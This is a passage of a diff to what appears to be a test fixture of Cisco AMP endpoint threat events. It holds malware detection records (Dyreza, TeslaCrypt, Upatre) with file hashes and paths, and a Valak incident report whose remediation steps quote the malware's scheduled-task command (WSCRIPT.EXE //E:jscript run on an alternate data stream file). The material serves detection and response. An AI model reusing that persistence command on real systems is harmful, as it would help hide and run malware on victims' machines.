Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 